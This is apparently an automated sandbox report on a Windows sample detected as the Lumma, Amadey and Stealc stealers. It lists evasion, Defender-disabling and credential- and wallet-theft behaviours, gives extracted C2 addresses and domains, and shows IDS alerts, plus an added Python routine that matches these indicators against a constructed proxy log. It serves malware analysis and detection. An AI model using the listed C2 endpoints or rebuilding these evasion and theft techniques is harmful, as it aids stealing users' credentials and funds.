Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545100
MD5: 7f339d0252f408065abe57ac23eed91c
SHA1: 1f07e6f292500fd235ec540cb56045a3081efa6d
SHA256: c94e84bee19b31c4663f8df36368ed87dd16e2021b5727a45c973ed8cf04dc0d
Tags: exe, user-Bitsight

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SIDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings whose development drew on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000004.00000003.2386839542.0000000005390000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 32.2.num.exe.bf0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: 58ce8f976c.exe.6068.10.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["presticitpo.store", "fadehairucw.store", "thumbystriw.store", "crisiwarny.store", "founpiuer.store", "navygenerayk.store", "necklacedmny.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe ReversingLabs: Detection: 34%
Source: file.exe Virustotal: Detection: 47%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49994 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49998 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49999 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50001 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50007 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50009 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50013 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50042 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50063 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50067 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50075 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50080 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50082 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50083 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50086 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50087 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50089 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50090 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50092 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50105 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50106 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50110 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50116 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50117 version: TLS 1.2
Source: Binary string: my_library.pdbU source: 7451ae0b11.exe, 0000000B.00000003.2960373733.0000000004BCB000.00000004.00001000.00020000.00000000.sdmp, 7451ae0b11.exe, 0000000B.00000002.3001129617.000000000016C000.00000040.00000001.01000000.0000000E.sdmp, num.exe, 00000025.00000000.3281198847.0000000000C1C000.00000008.00000001.01000000.0000001A.sdmp
Source: Binary string: my_library.pdb source: 7451ae0b11.exe, 0000000B.00000003.2960373733.0000000004BCB000.00000004.00001000.00020000.00000000.sdmp, 7451ae0b11.exe, 0000000B.00000002.3001129617.000000000016C000.00000040.00000001.01000000.0000000E.sdmp, num.exe, 00000025.00000000.3281198847.0000000000C1C000.00000008.00000001.01000000.0000001A.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 7YW0363WEKP7ULOI0QRA.exe, 00000003.00000002.2506913833.0000000000B12000.00000040.00000001.01000000.00000006.sdmp, 7YW0363WEKP7ULOI0QRA.exe, 00000003.00000003.2373622075.0000000005130000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Directory queried: number of queries: 1403
Source: firefox.exe Memory has grown: Private usage: 0MB later: 188MB
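The three Malware Configuration Extractor lines above carry the operational indicators of this chain: Amadey's C2 path and install name, Stealc's gate URL and botnet tag, and Lumma's eight .store domains. The Suricata alerts in the next section repeat the same indicators in defanged form (a space inserted before the TLD, as in "necklacedmny .store"). The following Python is an added worked example, not part of the sandbox report: it normalizes both encodings into one indicator set and runs it over a small, constructed proxy log. Two heuristics are taken directly from this page: the "TeslaBrowser/5.5" user agent attributed to Lumma in the classification text, and the "HTTP GET or POST without a user agent" signature. Destination IPs of domain-keyed alerts (DNS lookups, TLS SNI) are deliberately not promoted to indicators; in this report they are the sandbox resolver (1.1.1.1) and the shared address the .store domains resolve to (188.114.96.3), neither of which identifies the C2 on its own. The proxy-log lines and their format are constructed for the demonstration.

```python
# Added example: normalize this report's indicator lines into one IOC set and scan
# proxy-log lines against it. Suricata messages defang domains with a space before the
# TLD ("necklacedmny .store"); the extractor lines carry JSON. Standard library only.
from __future__ import annotations
import json
import re
from dataclasses import dataclass, field
from ipaddress import ip_address
from urllib.parse import urlsplit

# Indicator lines copied from the report above.
REPORT_LINES = [
    'Source: 00000004.00000003.2386839542.0000000005390000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}',
    'Source: 32.2.num.exe.bf0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}',
    'Source: 58ce8f976c.exe.6068.10.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["presticitpo.store", "fadehairucw.store", "thumbystriw.store", "crisiwarny.store", "founpiuer.store", "navygenerayk.store", "necklacedmny.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}',
    "Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.6:57186 -> 1.1.1.1:53",
    "Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49709 -> 188.114.96.3:443",
    "Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49991 -> 185.215.113.43:80",
    "Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50005 -> 185.215.113.206:80",
]
# Constructed proxy log for the demonstration (not from the report): tab-separated
# timestamp, client, method, URL, user agent ("-" = header absent).
PROXY_LOG = [
    "2024-10-30T04:24:20Z\t10.0.0.7\tGET\thttp://185.215.113.43/files/random.exe\t-",
    "2024-10-30T04:24:31Z\t10.0.0.7\tPOST\thttps://necklacedmny.store/api\tMozilla/5.0",
    "2024-10-30T04:25:02Z\t10.0.0.7\tPOST\thttps://example-cdn.invalid/upload\tTeslaBrowser/5.5",
    "2024-10-30T04:25:10Z\t10.0.0.7\tGET\thttps://www.example.com/\tMozilla/5.0",
    "2024-10-30T04:25:15Z\t10.0.0.7\tPOST\thttp://185.215.113.206/6c4adf523b719729.php\t-",
]

CONFIG_RE = re.compile(r"Malware Configuration Extractor: (\w+) (\{.*\})\s*$")
SURICATA_RE = re.compile(r"Suricata IDS: \d+ - Severity \d+ - (?P<msg>.*?) : [\d.]+:\d+ -> (?P<dst>[\d.]+):(?P<port>\d+)\s*$")
DEFANGED_RE = re.compile(r"\(([a-z0-9-]+(?:\.[a-z0-9-]+)*) \.([a-z]{2,})\b")
FAMILY_ALIASES = {"lumma": "LummaC", "amadey": "Amadey", "stealc": "StealC"}  # extractor's family names
LUMMA_USER_AGENT = "TeslaBrowser/5.5"  # from the Lumma classification text above

@dataclass
class IOCSet:  # indicator -> families it was attributed to
    domains: dict[str, set[str]] = field(default_factory=dict)
    ips: dict[str, set[str]] = field(default_factory=dict)
    urls: dict[str, set[str]] = field(default_factory=dict)

    def add(self, kind: str, value: str, family: str) -> None:
        getattr(self, kind).setdefault(value, set()).add(family)

def is_ip(host: str) -> bool:
    try:
        ip_address(host)
    except ValueError:
        return False
    return True

def family_from_message(msg: str) -> str:
    lowered = msg.lower()
    return next((fam for alias, fam in FAMILY_ALIASES.items() if alias in lowered), "unknown")

def extract_iocs(lines: list[str]) -> IOCSet:
    iocs = IOCSet()
    for line in lines:
        cfg, ids = CONFIG_RE.search(line), SURICATA_RE.search(line)
        if cfg:
            family, config = cfg.group(1), json.loads(cfg.group(2))
            c2 = config.get("C2 url", [])
            for entry in ([c2] if isinstance(c2, str) else c2):
                # Amadey's config omits the scheme; add one so urlsplit sees the host.
                parts = urlsplit(entry if "://" in entry else "http://" + entry)
                host = parts.hostname or ""
                iocs.add("ips" if is_ip(host) else "domains", host, family)
                if parts.path and parts.path != "/":
                    iocs.add("urls", f"{parts.scheme}://{host}{parts.path}", family)
        elif ids:
            family = family_from_message(ids.group("msg"))
            defanged = DEFANGED_RE.search(ids.group("msg"))
            if defanged:  # domain-keyed alert (DNS lookup / TLS SNI): the domain is the indicator,
                iocs.add("domains", f"{defanged.group(1)}.{defanged.group(2)}", family)  # not the resolver/edge IP
            elif int(ids.group("port")) != 53 and not ip_address(ids.group("dst")).is_private:
                iocs.add("ips", ids.group("dst"), family)
    return iocs

def scan_proxy_log(lines: list[str], iocs: IOCSet) -> list[tuple[str, str, list[str]]]:
    """(timestamp, host, sorted reasons) for every line that matches an indicator or heuristic."""
    hits = []
    for line in lines:
        ts, _client, _method, url, ua = line.split("\t")
        parts = urlsplit(url)
        host = parts.hostname or ""
        reasons = {f"c2-domain:{f}" for f in iocs.domains.get(host, ())}
        reasons |= {f"c2-ip:{f}" for f in iocs.ips.get(host, ())}
        reasons |= {f"c2-url:{f}" for f in iocs.urls.get(f"{parts.scheme}://{host}{parts.path}", ())}
        if ua == LUMMA_USER_AGENT:
            reasons.add("lumma-user-agent")
        if ua in ("", "-"):  # the report's "HTTP GET or POST without a user agent" signature
            reasons.add("no-user-agent")
        if reasons:
            hits.append((ts, host, sorted(reasons)))
    return hits
```

The indicator matches (c2-domain, c2-ip, c2-url) are the high-confidence output. The two user-agent checks are corroboration only: an absent User-Agent header is common in legitimate tooling, so "no-user-agent" on its own should not drive a block, while "lumma-user-agent" is specific but trivially changed by the operator.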

Networking

Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.6:57186 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:57079 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:60191 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:63856 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:62598 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49713 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49715 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49711 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49712 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49721 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49732 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49754 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49991 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:58724 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:53810 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:58432 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49994 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49992
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:60114 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49998 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49996 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50000 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50001 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50002 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50003 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50004 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50005 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50007 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:54014 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:62377 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:51693 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:64260 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50009 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50011 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50013 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50016 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50010 -> 188.114.96.3:443
